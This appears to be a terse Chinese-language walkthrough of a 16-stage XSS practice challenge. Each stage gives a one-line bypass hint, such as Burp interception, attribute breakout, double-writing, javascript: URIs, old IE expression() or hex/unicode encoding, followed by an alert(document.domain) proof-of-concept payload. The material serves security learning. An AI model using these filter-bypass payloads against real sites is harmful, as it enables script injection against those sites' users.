Stage #1
payload:
<script>alert(document.domain);</script>
Stage #2
payload:
"><script>alert(document.domain);</script>
Stage #3
burp抓包,在p2处输入payload
payload:
</option><script>alert(document.domain)</script>
Stage #4
burp抓包,p3处输入payload
payload:
“><svg onload=alert(document.domain)>
Stage #5
更改p1处的maxlength="15"
payload:
"><script>alert(document.domain);</script>
Stage #6
输入<>会被替换< >
payload:
"onmouseover="alert(document.domain);
Stage #7
输入空格过滤
payload:
qwe onmouseover=alert(document.domain);
Stage #8
用伪协议执行script
payload:
javascript:alert(document.domain)
Stage #9
utf-7编码(现在基本很少使用)用旧版IE,在前端输入绕过
payload:
"onmouseover="alert(document.domain)
Stage #10
双写绕过
payload:
"><script>alert(document.domdomainain);</script>
Stage #11
过滤js脚本字符和事件字符,考虑<a>标签名
payload:
"><a href="javascript:alert(document.domain);">1</a>
Stage #12
利用IE浏览器的 `` 过滤
payload:
``onmouseover=alert(document.domain);
Stage #13
用旧版IE特性触发xss
payload:
background-color:#ffff;background:url("javascript:alert(document.domain);");
Stage #14
用旧版IE特性触发xss
payload:
xss:ex/**/pression(if(!window.x){alert(document.domain);window.x=1})
Stage #15
用16进制编码或unicode编码绕过过滤
payload:
\x3cscript\x3ealert(document.domain);\x3c/script\x3e
Stage #16
用unicode编码绕过过滤
payload:
\u003cscript\u003ealert(document.domain);\u003c/script\u003e